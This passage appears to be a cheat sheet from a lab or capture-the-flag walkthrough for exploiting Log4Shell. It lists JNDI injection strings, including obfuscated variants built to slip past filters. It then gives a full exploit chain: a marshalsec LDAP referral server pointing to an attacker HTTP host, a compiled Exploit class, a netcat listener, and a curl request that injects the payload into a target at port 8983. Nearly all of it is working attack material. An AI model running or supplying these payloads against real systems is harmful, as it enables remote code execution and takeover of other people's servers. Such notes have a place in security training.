${jndi:ldap://127.0.0.1:1389/a}
${j${upper:n:-\n}di:ldap://example.com:1389/a}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer "http://ATTACKERIP:8000/#Exploit"
javac Exploit.java -source 8 -target 8
python3 -m http.server
| nc -lvnp 9999
curl 'http://MACHINE_IP:8983/PATH\{jndi:ldap://ATTACKERIP:1389/Exploit\}'
Another exploitation example provided by Tract0r: